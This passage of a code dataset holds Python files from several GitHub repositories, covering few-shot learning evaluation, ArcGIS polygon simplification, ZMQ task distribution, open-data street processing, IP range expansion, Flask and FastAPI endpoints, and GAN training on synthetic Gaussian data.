len(train_noveldset)-->nclasses*nExemplar_per_class, fSz\n dist = torch.mm(x,y.t()) # size: len(val_noveldset)-->bSz, allExemplars\n vals, inds = traintargets.sort()\n dist = dist[:,inds].view(dist.size(0),nNovel, k)\n if usemean:\n dist = dist.mean(2)\n else:\n dist = dist.min(2)[0]# take min distance over nExemplars of each class\n # eval on val_noveldset by computing NN to features in train_noveldset\n accs = accuracy(dist, torch.LongTensor(testtargets), topk=(topk,))\n results[k].append(accs)\n ret[k] = get_mean_ci(np.array(results[k])[:,0])\n \n if test:\n self.writer.add_scalar('Test_CC/1-shot', ret[1][0], episode)\n self.writer.add_scalar('Test_CC/5-shot', ret[5][0], episode)\n if episode % 1000 == 0:\n print('----------')\n print(f'Episode: {episode}/{nEpisodes}')\n for k in kshots:\n print(' {}-shot top-{} acc: {:0.2f}±{:0.2f}'.format(k, topk, *ret[k]))\n print('----------')\n print('Final')\n print('----------')\n for k in kshots:\n print(' {}-shot top-{} acc: {:0.2f}±{:0.2f}'.format(k, topk, *ret[k]))\n print('----------')\n s = time.time()-start_time\n print(f'Took: {s:0.2f}s')\n return ret\n \n def init_dataloader(self, dset):\n class_sample_count = [len(c) for c in dset.classes]\n weights = 1 / torch.Tensor(class_sample_count)\n weights[~((weights + 1) != weights)]= 0\n weight_per_sample = [0]*len(dset)\n for i in 
range(len(dset)):\n c, cind = dset.index_to_sample_d[i]\n weight_per_sample[i] = weights[c]\n self.trainsampler = sampler.WeightedRandomSampler(weight_per_sample, len(dset))\n self.trainloader = DataLoader(dset, batch_size=self.opt.bSz, pin_memory=True, num_workers=self.opt.n_workers, sampler=self.trainsampler, drop_last=True)\n \n def get_val_test_sets(self):\n if self.opt.benchmark in ['miniIN','cub', 'tieredIN','flower'] or 'miniIN1k' in self.opt.benchmark:\n if 'miniIN1k' in self.opt.benchmark:\n self.valdset = get_dataset('miniIN', split='val', iSz=self.opt.iSz)\n else:\n self.valdset = get_dataset(self.opt.benchmark, split='val', iSz=self.opt.iSz)\n \n if self.opt.test_json:\n self.testdset = dset_from_json('data/test_benchmarks/miniIN1k_nim100_seed0.json')\n else:\n self.testdset = get_dataset(self.opt.benchmark, split='test', iSz=self.opt.iSz)\n self.nNovel = 5\n self.nTest = 15 # per class\n self.topk = 1\n elif self.opt.benchmark == 'IN':\n self.valdset = get_dataset(self.opt.benchmark, split='val')\n self.testdset = get_dataset(self.opt.benchmark, split='test')\n self.nNovel = 250\n self.nTest = 6 # per class\n self.topk = 5\n else:\n raise NotImplementedError('Need to implement eval set for IN')\n \n transform = get_transform(self.ttype, phase='test', do_normalize=True, iSz=self.opt.iSz)\n self.valdset.transform = transform\n self.testdset.transform = transform\n\n\nclass EpisodicBatchSampler(torch.utils.data.Sampler):\n def __init__(self, dset, nway=5, nsupport=1, nquery=10, seed=None):\n self.nepisodes = 1+len(dset)//(nway*(nquery+nsupport))\n self.dset = dset\n self.nway = nway\n self.nsupport = nsupport\n self.nquery = nquery\n self.seed = seed\n self.epoch = 0\n\n def __iter__(self):\n indices = []\n for i in range(self.nepisodes):\n # sample class indices\n seed_i = None if self.seed is None else self.seed+i+self.epoch\n gen = get_generator(seed_i)\n class_inds = torch.randperm(len(self.dset.classes), generator=gen)[:self.nway].tolist()\n for ind in class_inds:\n c = self.dset.classes[ind]\n cinds = torch.randperm(len(c), generator=gen)[:self.nsupport+self.nquery]\n start = self.dset.cum_len[ind]; end = self.dset.cum_len[ind+1]\n cinds = torch.LongTensor(range(start, end))[cinds]\n indices.append(cinds)\n indices = torch.cat(indices)\n return iter(indices.tolist())\n \n def __len__(self):\n return self.nepisodes","repo_name":"facebookresearch/fewshotDatasetDesign","sub_path":"trainer.py","file_name":"trainer.py","file_ext":"py","file_size_in_byte":16890,"program_lang":"python","lang":"en","doc_type":"code","stars":25,"dataset":"github-code","pt":"54"} +{"seq_id":"19760660632","text":"# encoding: utf-8\n# simplify polygons in batches\n\nimport arcpy\nimport datetime\n\n\n# controlling process\nif __name__ == '__main__':\n # settings\n arcpy.env.overwriteOutput = True\n\n # parameters\n folder = 'C:/GIS/EBAR/'\n input_gdb = folder + 'EBAR4.gdb/'\n input_fc = 'RangeMapInputCopy'\n output_name = 'EBAR4.gdb'\n output_gdb = folder + output_name\n min_objectid = 0\n max_objectid = 10000\n batch_size = 10000\n min_accuracy = 1\n max_accuracy = 5\n tolerance = '0.1'\n\n # create output gdb\n if not arcpy.Exists(output_gdb):\n arcpy.CreateFileGDB_management(folder, output_name)\n\n # layer to allow selections\n arcpy.MakeFeatureLayer_management(input_gdb + input_fc, 'rmi_lyr')\n current_min = min_objectid\n # batch loop\n print(datetime.datetime.now())\n while current_min < max_objectid:\n print(current_min)\n # selection for current batch\n 
arcpy.SelectLayerByAttribute_management('rmi_lyr', 'NEW_SELECTION',\n 'objectid >= ' + str(current_min) +\n ' AND objectid < ' + str(current_min + batch_size) +\n ' AND Accuracy >= ' + str(min_accuracy) +\n ' AND Accuracy < ' + str(max_accuracy) +\n \" AND OriginalGeometryType = 'P'\")\n # default to 10 meter accuracy (1 meter toloerance) if not provided\n if tolerance == '1 meters':\n arcpy.SelectLayerByAttribute_management('rmi_lyr', 'ADD_TO_SELECTION',\n 'objectid >= ' + str(current_min) +\n ' AND objectid < ' + str(current_min + batch_size) +\n ' AND Accuracy IS NULL'\n \" AND OriginalGeometryType = 'P'\")\n arcpy.SelectLayerByAttribute_management('rmi_lyr', 'ADD_TO_SELECTION',\n 'objectid >= ' + str(current_min) +\n ' AND objectid < ' + str(current_min + batch_size) +\n ' AND Accuracy <= 0'\n \" AND OriginalGeometryType = 'P'\")\n result = arcpy.GetCount_management('rmi_lyr')\n print(result[0])\n if int(result[0]) > 0:\n arcpy.SimplifyPolygon_cartography('rmi_lyr', output_gdb + '/' + input_fc + str(current_min), 'POINT_REMOVE',\n tolerance, collapsed_point_option='NO_KEEP', error_option='RESOLVE_ERRORS')\n print(datetime.datetime.now())\n current_min += batch_size\n\n # input = 'C:\\GIS\\EBAR\\EBAR-KBA-Dev.gdb\\RangeMapInput'\n # temp = 'C:\\GIS\\EBAR\\EBAR-KBA-Dev.gdb\\TempRangeMapInputX'\n # output = 'C:\\GIS\\EBAR\\EBAR-KBA-Dev.gdb\\TempRangeMapInput'\n # # input = 'C:/GIS/EBAR/nsc-gis-ebarkba.sde/RangeMapInput'\n # # temp = 'C:/GIS/EBAR/EBAR4.gdb/TempRangeMapInput'\n # # output = 'C:/GIS/EBAR/nsc-gis-ebarkba.sde/TestRangeMapInputY'\n # # arcpy.env.workspace = 'C:/GIS/EBAR/EBAR4.gdb'\n # # arcpy.env.scratchWorkspace = 'C:/GIS/EBAR/EBAR4.gdb'\n\n # arcpy.MakeFeatureLayer_management(input, 'rmi_lyr') #, 'OBJECTID > 1281') #, \"OriginalGeometryType NOT IN ('Y')\")\n # with arcpy.da.SearchCursor('rmi_lyr', ['OBJECTID', 'Accuracy', 'OriginalGeometryType'], sql_clause=(None,'ORDER BY OBJECTID')) as search_cursor:\n # for row in search_cursor:\n # print(row[0])\n # arcpy.SelectLayerByAttribute_management('rmi_lyr', 'NEW_SELECTION', 'OBJECTID = ' + str(row[0]))\n # if row[2] == 'P':\n # # simplify\n # accuracy = 10\n # if row[1]:\n # if row[1] > 0:\n # accuracy = row[1]\n # tolerance = '100 Meters'\n # if accuracy < 500:\n # tolerance = '10 Meters'\n # if accuracy < 50:\n # tolerance = '1 Meters'\n # if accuracy < 5:\n # tolerance = '10 Centimeters'\n # arcpy.SimplifyPolygon_cartography('rmi_lyr', temp, 'POINT_REMOVE', tolerance, collapsed_point_option='NO_KEEP')\n # arcpy.AddGlobalIDs_management(temp)\n # # append simplified\n # field_mapping = 'GlobalID \"GlobalID\" false false true 38 GlobalID 0 0,First,#,' + temp + \\\n # ',GlobalID,-1,-1;RangeMapID \"RangeMapID\" true true false 4 Long 0 0,First,#,' + temp + \\\n # ',RangeMapID,-1,-1;DatasetSourceName \"DatasetSourceName\" true true false 255 Text 0 0,First,#,' + temp + \\\n # ',DatasetSourceName,0,255;DatasetType \"DatasetType\" true true false 255 Text 0 0,First,#,' + temp + \\\n # ',DatasetType,0,255;Accuracy \"Accuracy\" true true false 4 Long 0 0,First,#,' + temp + \\\n # ',Accuracy,-1,-1;MaxDate \"MaxDate\" true true false 8 Date 0 0,First,#,' + temp + \\\n # ',MaxDate,-1,-1;CoordinatesObscured \"CoordinatesObscured\" true true false 2 Short 0 0,First,#,' + temp + \\\n # ',CoordinatesObscured,-1,-1;OriginalGeometryType \"OriginalGeometryType\" true true false 1 Text 0 0,First,#,' + temp + \\\n # ',OriginalGeometryType,0,1;NationalScientificName \"NationalScientificName\" true true false 255 Text 0 0,First,#,' + temp + \\\n # 
',NationalScientificName,0,255;SynonymName \"SynonymName\" true true false 255 Text 0 0,First,#,' + temp + \\\n # ',SynonymName,0,255;URI \"URI\" true true false 1000 Text 0 0,First,#,' + temp + \\\n # ',URI,0,1000;EORank \"EORank\" true true false 2 Text 0 0,First,#,' + temp + \\\n # ',EORank,0,2;DatasetSourceUniqueID \"DatasetSourceUniqueID\" true true false 255 Text 0 0,First,#,' + temp + \\\n # ',DatasetSourceUniqueID,0,255'\n # arcpy.Append_management(temp, output, 'NO_TEST', field_mapping)\n # else:\n # # append original\n # arcpy.Append_management('rmi_lyr', output, 'TEST')\n","repo_name":"NatureServe-Canada/EBARTools","sub_path":"SimplifyExistingInputs.py","file_name":"SimplifyExistingInputs.py","file_ext":"py","file_size_in_byte":6334,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"54"} +{"seq_id":"12012102185","text":"from comm.sendrecv import recv_zipped_pickle, send_next_chunk\nimport numpy as np\nfrom genutils.ptyprint import printprogress\n\ndef dstr_collect(keys,n,gen,socket,zlevel=-1,verb=False):\n \"\"\"\n Distributes data to workers\n and collects the results based on the keys passed\n\n Parameters:\n keys - list of keys to expect to receive from client\n n - length of input generator\n gen - an input generator that gives a chunk\n socket - a ZMQ socket\n zlevel - level of compression [0]\n\n Returns a dictionary with keys of keys and values\n returned by the client\n \"\"\"\n # Create the outputs\n odict = {}\n for ikey in keys: odict[ikey] = []\n # Control key\n ckey = keys[0]\n # Verbosity\n old = -1\n # Send and collect work\n while(len(odict[ckey]) < n):\n if(verb):\n if(old < len(odict[ckey])):\n printprogress(ckey+\":\",len(odict[ckey]),n)\n old = len(odict[ckey])\n # Talk to client\n rdict = recv_zipped_pickle(socket)\n if(rdict['msg'] == \"available\"):\n # Send work\n send_next_chunk(socket,gen,zlevel)\n elif(rdict['msg'] == \"result\"):\n # Save the results\n for ikey in keys:\n odict[ikey].append(rdict[ikey])\n # Send a \"thank you\" back\n socket.send(b\"\")\n\n if(verb): printprogress(ckey+\":\",len(odict[ckey]),n)\n\n return odict\n\ndef dstr_sum(ckey,rkey,n,gen,socket,shape,ikey='idx',zlevel=-1):\n \"\"\"\n Distributes data to workers\n and sums over the collected results\n\n Parameters:\n ckey - a control key for managing submissions\n rkey - a result key for summing the results\n n - length of input generator\n gen - an input generator that gives a junk\n socket - a ZMQ socket\n shape - the shape of the output array\n ikey - key for sending the index for chunked transfer ['idx']\n zlevel - level of compression [0]\n\n Returns:\n Sums over the work returned by workers to give an\n output array of size shape\n \"\"\"\n # Create the outputs\n out = np.zeros(shape,dtype='float32')\n chunks,nhx = False,1\n if(len(shape) > 3):\n chunks = True\n nhx = shape[1]\n nouts = []\n # Send and sum over collected results\n while(len(nouts)//nhx < n):\n rdict = recv_zipped_pickle(socket)\n if(rdict['msg'] == \"available\"):\n # Send work\n send_next_chunk(socket,gen,zlevel=zlevel)\n elif(rdict['msg'] == \"result\"):\n nouts.append(rdict[ckey])\n if(chunks):\n out[0,rdict[ikey]] += rdict[rkey]\n else:\n out += rdict[rkey]\n socket.send(b\"\")\n\n return out\n\n","repo_name":"ke0m/distrmq","sub_path":"server/distribute.py","file_name":"distribute.py","file_ext":"py","file_size_in_byte":2535,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"54"} 
+{"seq_id":"33191884494","text":"#!/usr/bin/python3\n# -!- encoding:utf8 -!-\n\n# ---------------------------- IMPORTS\n\nfrom subprocess import call\nfrom ...fs.fs import list_heatmap_streets\nfrom ...fs.fs import load_heatmap_streets\nfrom ...fs.fs import dump_heatmap_grid\nfrom ...fs.fs import dump_heatmap_psd\nfrom ...printer.printer import print_progress\n\n# ---------------------------- CONFIGURATION\n\nbaseurl = 'https://download.data.grandlyon.com/wfs/grandlyon'\nparams = {\n 'SERVICE': 'WFS',\n 'VERSION': '2.0.0',\n 'outputformat': 'GEOJSON',\n 'maxfeatures': '1000000000',\n 'request': 'GetFeature',\n 'typename': 'adr_voie_lieu.adraxevoie',\n 'SRSNAME': 'urn:ogc:def:crs:EPSG::4171'\n}\n\n# ---------------------------- FUNCTIONS\n\n\ndef download_streets_data():\n \"\"\"\n Récupère les données des rues en utilisant l'api du Grand Lyon\n \"\"\"\n # build url\n url = baseurl + '?'\n for key, value in params.items():\n url += key + '=' + value + '&'\n url = url[:-1]\n # call wget\n print('[process_streets.py]> retrieving data...')\n call(['wget', '-O', list_heatmap_streets(), url])\n print('[data_processor.py]> done !')\n\n\ndef split_on_commune(data):\n \"\"\"\n Création d'un dictionnaire indexé sur les communes pour les rues\n \"\"\"\n # split data structure using 'nomcommune' field\n streets = data['features']\n communes = {}\n total = len(streets)\n i = 0\n print('[process_streets.py]> processing %s streets...' % total)\n for street in streets:\n i += 1\n if i % 100 == 0:\n print_progress(i, total)\n commune = street['properties']['nomcommune']\n if commune not in communes.keys():\n communes[commune] = []\n # add street to commune\n communes[commune].append({\n 'nom': street['properties']['nom'],\n 'coordinates': street['geometry']['coordinates']\n })\n print('[process_streets.py]> done !')\n return communes\n\n\ndef create_files(communes):\n \"\"\"\n Génération des fichiers de sortie (psd, grille)\n \"\"\"\n # creating ouput files\n for commune, data in communes.items():\n print('[process_streets.py]> writing psd file for %s...' % commune, end='')\n dump_heatmap_psd(commune, data)\n print('done !')\n print('[process_streets.py]> writing grid file for %s...' 
% commune, end='')\n coordinates = []\n for elem in data:\n coordinates += elem['coordinates']\n dump_heatmap_grid(commune, coordinates)\n print('done !')\n\n\ndef process_streets():\n \"\"\"\n Découpage intégral du fichier streets.json en fichiers par commune\n \"\"\"\n # load streets data\n streets = load_heatmap_streets()\n # split on communes\n communes = split_on_commune(streets)\n # create output files\n create_files(communes)\n\n\ndef update_streets_data():\n \"\"\"\n Télécharge et lance le traitement des données\n \"\"\"\n # download data\n download_streets_data()\n # process data\n process_streets()\n","repo_name":"Hexanonyme/PLD_SmartCity","sub_path":"Backend/api/maintenance/heatmap/process_streets.py","file_name":"process_streets.py","file_ext":"py","file_size_in_byte":3008,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"8962825911","text":"# -*- coding: utf-8 -*-\n'''\nЗадание 12.2\n\n\nФункция check_ip_addresses из задания 12.1 принимает только список адресов,\nно было бы удобно иметь возможность указывать адреса с помощью диапазона, например, 192.168.100.1-10.\n\nВ этом задании необходимо создать функцию convert_ranges_to_ip_list,\nкоторая конвертирует список IP-адресов в разных форматах в список, где каждый IP-адрес указан отдельно.\n\nФункция ожидает как аргумент список IP-адресов и/или диапазонов IP-адресов.\n\nЭлементы списка могут быть в формате:\n* 10.1.1.1\n* 10.1.1.1-10.1.1.10\n* 10.1.1.1-10\n\nЕсли адрес указан в виде диапазона, надо развернуть диапазон в отдельные адреса, включая последний адрес диапазона.\nДля упрощения задачи, можно считать, что в диапазоне всегда меняется только последний октет адреса.\n\nФункция возвращает список IP-адресов.\n\n\nНапример, если передать функции convert_ranges_to_ip_list такой список:\n['8.8.4.4', '1.1.1.1-3', '172.21.41.128-172.21.41.132']\n\nФункция должна вернуть такой список:\n['8.8.4.4', '1.1.1.1', '1.1.1.2', '1.1.1.3', '172.21.41.128',\n '172.21.41.129', '172.21.41.130', '172.21.41.131', '172.21.41.132']\n\n'''\nfrom ipaddress import ip_address\n\n\ndef check_if_ip_is_network(ip_a):\n '''\n The function checks validity of IP addresses\n :param ip_a: # ip-addresses\n :return: True / False\n '''\n try:\n ip_address(ip_a)\n return True\n except ValueError:\n return False\n\n\ndef convert_ranges_to_ip_list(list_of_ip):\n '''\n The function converts the list of IP addresses in different formats to a list where each IP address is listed\n separately.\n :param list_of_ip: # a list of ip-addresses and/or ip-address ranges\n :return: ip_list # a list of ip-addresses\n '''\n to_ip_list = []\n for list_ip in list_of_ip:\n if check_if_ip_is_network(list_ip):\n to_ip_list.append(list_ip) # appended into the list a valid ip-address\n else:\n list_ip = list_ip.split('-')\n range_ip = (int(list_ip[1].split('.')[-1]) - int(list_ip[0].split('.')[-1]))\n list_ip = ip_address(list_ip[0])\n for i in range(0, range_ip + 1):\n to_ip_list.append(str(list_ip))\n list_ip += 1\n i += 1\n return to_ip_list\n\n\nlist_ip = ['8.8.4.4', '1.1.1.1-3', '172.21.41.128-172.21.41.132', '8.8.8.8']\nprint(convert_ranges_to_ip_list(list_ip))","repo_name":"gusevroman/Python-Network","sub_path":"exercises/12_useful_modules/task_12_2.py","file_name":"task_12_2.py","file_ext":"py","file_size_in_byte":3011,"program_lang":"python","lang":"ru","doc_type":"code","stars":1,"dataset":"github-code","pt":"54"} +{"seq_id":"13219255887","text":"from flask import Blueprint, request, jsonify\nfrom api.models import 
Availability, MentorProfile\nfrom api.core import create_response, logger\nfrom api.utils.require_auth import all_users\n\navailability = Blueprint(\"availability\", __name__)\n\n\n# Get request for avalability for a specific mentor\n@availability.route(\"/\", methods=[\"GET\"])\n@all_users\ndef get_availability(id):\n try:\n availability = MentorProfile.objects.get(id=id).availability\n except:\n msg = \"No mentor found with that id\"\n logger.info(msg)\n return create_response(status=422, message=msg)\n\n return create_response(data={\"availability\": availability})\n\n\n# Put request to edit availability for a specific mentor\n@availability.route(\"/\", methods=[\"PUT\"])\n@all_users\ndef edit_availability(id):\n data = request.get_json().get(\"Availability\")\n try:\n mentor = MentorProfile.objects.get(id=id)\n except:\n msg = \"No mentor found with that id\"\n logger.info(msg)\n return create_response(status=422, message=msg)\n\n mentor.availability = [\n Availability(\n start_time=availability.get(\"start_time\").get(\"$date\"),\n end_time=availability.get(\"end_time\").get(\"$date\"),\n )\n for availability in data\n ]\n mentor.save()\n return create_response(status=200, message=f\"Success\")\n","repo_name":"hack4impact-uiuc/mentee","sub_path":"backend/api/views/availability.py","file_name":"availability.py","file_ext":"py","file_size_in_byte":1356,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"54"} +{"seq_id":"72355804962","text":"from fastapi import FastAPI\nfrom fastapi.middleware.cors import CORSMiddleware\nfrom fastapi.responses import HTMLResponse\n\nfrom document_extract import CandidateInfo, extract_candidate_infos, render_candidate_infos\n\nimport uvicorn\nimport threading\nimport logging\nimport time\n\nfrom pathlib import Path\nfrom datetime import datetime\n\ndef setup_fastapi():\n app = FastAPI()\n origins = [\"*\"]\n app.add_middleware(\n CORSMiddleware,\n allow_origins=origins,\n allow_credentials=True,\n allow_methods=[\"*\"],\n allow_headers=[\"*\"],\n )\n return app\n\nclass CandidateCache():\n candidate_info_html = \"

Processing, please wait ...

\"\n\ncandidate_cache = CandidateCache()\n\nSLEEP_TIME = 60 * 10\n\nclass BackgroundTasks(threading.Thread):\n\n \"\"\"\n Processes documents and query Chat GPT in the background.\n \"\"\"\n\n def __init__(self, candidate_cache: CandidateCache, sleep_time = SLEEP_TIME):\n super().__init__()\n self.candidate_cache, self.sleep_time = candidate_cache, sleep_time\n self.data_cache = sleep_time\n\n def run(self, *args, **kwargs):\n while True:\n candidate_infos: list[CandidateInfo] = extract_candidate_infos(Path(\".\"))\n self.candidate_cache.candidate_info_html = render_candidate_infos(candidate_infos)\n logging.info('Updated doc analysis')\n time.sleep(self.sleep_time)\n\nt = BackgroundTasks(candidate_cache)\nt.start()\n\napp = setup_fastapi()\n\n@app.get(\"/hello\")\nasync def hello():\n return {\n \"hello\": \"there\"\n }\n\n@app.get(\"/candidates.html\", response_class=HTMLResponse)\nasync def hello_html():\n\n def generate_timestamp():\n # Get the current date and time\n now = datetime.now()\n\n # Get the weekday, day, month, year, and time in English\n weekday = now.strftime(\"%A\")\n day = now.strftime(\"%d\")\n month = now.strftime(\"%B\")\n year = now.strftime(\"%Y\")\n time = now.strftime(\"%H:%M:%S\")\n\n # Create the timestamp string\n timestamp = f\"{weekday}, {day} {month} {year} {time}\"\n\n return timestamp\n\n return f\"\"\"\n\n \n \n \n \n \n \n \n
\n

Candidate Information

\n

{generate_timestamp()}

\n
\n
\n \n
\n
\n {candidate_cache.candidate_info_html}\n
\n \n \n\n\"\"\"\n\nif __name__ == '__main__':\n print(\"Fast API setup\") \n uvicorn.run(app, host=\"0.0.0.0\", port=8000)\n ","repo_name":"gilfernandes/document_stuff_playground","sub_path":"document_web.py","file_name":"document_web.py","file_ext":"py","file_size_in_byte":3761,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"54"} +{"seq_id":"5804814325","text":"from __future__ import (division, print_function, )\nfrom collections import OrderedDict\nfrom scipy.stats import multivariate_normal\nimport numpy.random as npr\nimport numpy as np\nfrom itertools import *\n\nfrom fuel import config\nfrom fuel.datasets import H5PYDataset, IndexableDataset\nfrom fuel.transformers.defaults import uint8_pixels_to_floatX\nfrom fuel.utils import find_in_data_path\nfrom fuel.streams import DataStream\nfrom fuel.schemes import ShuffledScheme\n\nimport torch\nimport torch.autograd as autograd\nimport torch.optim as optim\nimport torchvision\nimport torchvision.transforms as transforms\nfrom torch.autograd import Variable\nfrom torch.utils.data import Dataset\n\nimport scipy.misc\nimport imageio\nimport matplotlib.gridspec as gridspec\nimport os, time, pickle\nimport matplotlib\nmatplotlib.use('agg')\nimport matplotlib.pyplot as plt\nplt.switch_backend('agg')\nimport Gaussian_Sample_HighD as GS\n\nfrom scipy.stats import multivariate_normal, entropy\n\nimport argparse\nparser = argparse.ArgumentParser()\nparser.add_argument('-g', '--gpu', type=str, default='-1', metavar='GPU',\n help='set GPU id (default: -1)')\nparser.add_argument('-b', '--batch-size', type=int, default=128, metavar='N',\n help='input batch size for training (default: 128)')\nparser.add_argument('-e', '--epochs', type=int, default=100, metavar='E',\n help='how many epochs to train (default: 100)')\nparser.add_argument('--lr-g', type=float, default=1e-5, metavar='LR',\n help='initial ADAM learning rate of G (default: 1e-3)')\nparser.add_argument('--lr-d', type=float, default=1e-5, metavar='LR',\n help='initial ADAM learning rate of D (default: 1e-3)')\nparser.add_argument('--decay', type=float, default=0, metavar='D',\n help='weight decay or L2 penalty (default: 0)')\nparser.add_argument('-z', '--zdim', type=int, default=16, metavar='Z',\n help='dimension of latent vector (default: 16)')\n\nopt = parser.parse_args()\n\nimport os\nimport sys\nimport numpy as np\nimport ite\n\ncuda = 0 if opt.gpu == -1 else 1\nif cuda:\n os.environ[\"CUDA_VISIBLE_DEVICES\"] = opt.gpu\nBS = opt.batch_size\nZdim = opt.zdim\nIMAGE_PATH = 'GAN_images'\nMODEL_PATH = 'GAN_models'\nTEST = 5000\n\n# ===============\nimport torch\nimport torch.nn as nn\nimport torch.optim as optim\nfrom torch.utils.data import DataLoader\nfrom torchvision import datasets, transforms\nfrom torch.autograd import Variable\nfrom itertools import chain\nfrom torchvision.utils import save_image\nfrom GAN_highd import *\n\nif not os.path.exists(IMAGE_PATH):\n print('mkdir ', IMAGE_PATH)\n os.mkdir(IMAGE_PATH)\nif not os.path.exists(MODEL_PATH):\n print('mkdir ', MODEL_PATH)\n os.mkdir(MODEL_PATH)\n\n\ndef count(xx):\n import itertools\n import collections\n #X = [-2.5, -2, -1.5, -1, -0.5, 0, 0.5, 1, 1.5, 2]\n # Y = [-700, 700, 0, -1400, 1400]\n # MEANS = []\n # for x in X:\n # MEANS.append(np.array([x] * 700 + [0]*500))\n #VARIANCES = [0.05 ** 2 * np.eye(len(mean)) for mean in MEANS]\n #MEANS = [x + [0] * 500 for x in MEANS]\n\n MEANS = [np.array([i, j]) for i, j in itertools.product(range(-4, 5, 2),\n range(-4, 5, 2))]\n VARIANCES = [0.05 ** 2 
* np.eye(len(mean)) for mean in MEANS]\n SIGMA = np.log(0.05**2)\n\n l2_store = []\n for x_ in xx:\n l2_store.append([np.sum((x_ - i) ** 2) for i in MEANS])\n\n mode = np.argmin(l2_store, 1).flatten().tolist()\n dis_ = [l2_store[j][i] for j, i in enumerate(mode)]\n loglikehood_list = [-1.0*(np.sum(0.5 * (xx[j] - MEANS[i]) ** 2 * np.exp(-SIGMA) + 0.5 * SIGMA + 0.5 * np.log(2*np.pi))) for j, i in enumerate(mode)]\n loglikehood = np.mean(loglikehood_list)\n print(np.sqrt(dis_[0]))\n mode_counter = [mode[i] for i in range(len(mode)) if (np.sqrt(dis_[i])) <= 0.5]\n\n print('Number of Modes Captured: ', len(collections.Counter(mode_counter)))\n print('Number of Points Falling Within 3 std. of the Nearest Mode ', np.sum(\n collections.Counter(mode_counter).values()))\n print('Loglikehood is: ', loglikehood)\n\n\ndef prog_print(e,b,b_total,loss_g,loss_d):\n sys.stdout.write(\"\\r%3d: [%5d / %5d] G: %.4f D: %.4f\" %\n (e,b,b_total,loss_g,loss_d))\n sys.stdout.flush()\n\ndef train():\n # load models\n Gx = GeneratorX()\n Dx = DiscriminatorX()\n\n # load dataset\n # ==========================\n train_data, valid_data, trans_mtx = GS.main()\n train_dataset = GS.Gaussian_Data(train_data)\n valid_dataset = GS.Gaussian_Data(valid_data)\n\n dataloader = DataLoader(dataset=train_dataset,\n batch_size=BS,\n pin_memory= True,\n shuffle=True)\n validloader = DataLoader(dataset=valid_dataset,\n batch_size=TEST,\n pin_memory=True,\n shuffle=False)\n\n N = len(dataloader)\n # print(N)\n\n z = torch.FloatTensor(BS, Zdim).normal_(0, 1)\n z_pred = torch.FloatTensor(TEST, Zdim).normal_(0, 1)\n z_pred = Variable(z_pred)\n\n if cuda:\n Gx.cuda()\n Dx.cuda()\n z, z_pred = z.cuda(), z_pred.cuda()\n\n\n # optimizer\n optim_g = optim.Adam(chain(Gx.parameters()),\n lr=opt.lr_g, betas=(.5, .999), weight_decay=opt.decay)\n optim_d = optim.Adam(chain(Dx.parameters()),\n lr=opt.lr_d, betas=(.5, .999), weight_decay=opt.decay)\n\n # train\n # ==========================\n softplus = nn.Softplus()\n for epoch in range(opt.epochs):\n for i, (imgs, _) in enumerate(dataloader):\n batch_size = imgs.size(0)\n if cuda:\n imgs = imgs.cuda()\n imgs = Variable(imgs)\n z.resize_(batch_size, Zdim).normal_(0, 1)\n zv = Variable(z)\n\n # forward\n imgs_fake = Gx(zv)\n\n # discriminator\n d_true = Dx(imgs)\n d_fake = Dx(imgs_fake)\n\n # compute loss\n loss_d = torch.mean(softplus(-d_true) + softplus(d_fake))\n loss_g = torch.mean(softplus(-d_fake))\n\n # backward & update params\n Dx.zero_grad()\n loss_d.backward(retain_graph=True)\n optim_d.step()\n\n Gx.zero_grad()\n loss_g.backward()\n optim_g.step()\n\n prog_print(epoch+1, i+1, N, loss_g.data.item(), loss_d.data.item())\n\n # generate fake images\n # save_image(Gx(z_pred).data,\n # os.path.join(IMAGE_PATH,'%d.png' % (epoch+1)),\n # nrow=9, padding=1,\n # normalize=False)\n # save models\n print(\"-------> Saving models...\")\n torch.save(Gx.state_dict(),\n os.path.join(MODEL_PATH, 'Gx-%d.pth' % (epoch+1)))\n torch.save(Dx.state_dict(),\n os.path.join(MODEL_PATH, 'Dx-%d.pth' % (epoch+1)))\n\n # evaluate models\n x_eval = Gx(z_pred)\n x_eval = x_eval.data.cpu().numpy()\n count(x_eval)\n\n from numpy.random import multivariate_normal, randn\n x_mean = np.zeros(256)\n x_cov = trans_mtx.T.dot(trans_mtx)\n\n conditional_x_sample = z_pred.cpu().data.numpy().dot(trans_mtx)\n normal_x_sample = multivariate_normal(x_mean, x_cov, TEST)\n\n # Normality test\n from scipy.stats import normaltest, shapiro\n co = ite.cost.BDKL_KnnKiTi()\n # co_easy = ite.cost.BDKL_KnnK()\n\n # print(\"Our mean is {}, and 
var is {}\".format(np.mean(x_eval[:,0]), np.var(x_eval[:,0])))\n # print(\"True mean is {}, and var is {}\".format(np.mean(normal_x_sample[:,0]), np.var(normal_x_sample[:,0])))\n\n #print(\"The normal test p-value is: {}\".format(normaltest(z_sample.data)))\n # print(\"The shapiro test p-value for z is: {}\".format(shapiro(z_sample.data)))\n print(\"The shapiro test p-value for X is: {}\".format(shapiro(x_eval)))\n\n # print(\"The KL-divergence for z is: {}\".format(co.estimation(z_sample, normal_z_sample)))\n print(\"The KL-divergence for X marginal is: {}\".format(co.estimation(x_eval, normal_x_sample)))\n print(\"The KL-divergence for X conditional is: {}\".format(co.estimation(x_eval, conditional_x_sample)))\n # print(\"The KL-divergence between two X is {}\".format(co.estimation(normal_x_sample, conditional_x_sample)))\n\n\nif __name__ == '__main__':\n train()\n","repo_name":"alexanderhanboli/AIM","sub_path":"high_dimensional_experiments/train_GAN.py","file_name":"train_GAN.py","file_ext":"py","file_size_in_byte":8475,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"54"} +{"seq_id":"37531917106","text":"from hydra_python_core.doc_writer import (\n HydraClassOp,\n HydraClassProp,\n HydraError,\n HydraStatus,\n)\nfrom exceptions import HydraCollectionException\nfrom processors.api_info_processor import APIInfoProcessor\nfrom parsers.param_parser import ParameterParser\nfrom parsers.resp_parser import ResponseParser\nfrom processors.op_processor import OperationProcessor\nfrom parsers.schema_parser import SchemaParser\n\nfrom typing import Any, List, Dict, Union\n\n\nclass MethodParser:\n def __init__(self, method: str, method_details: Dict[str, 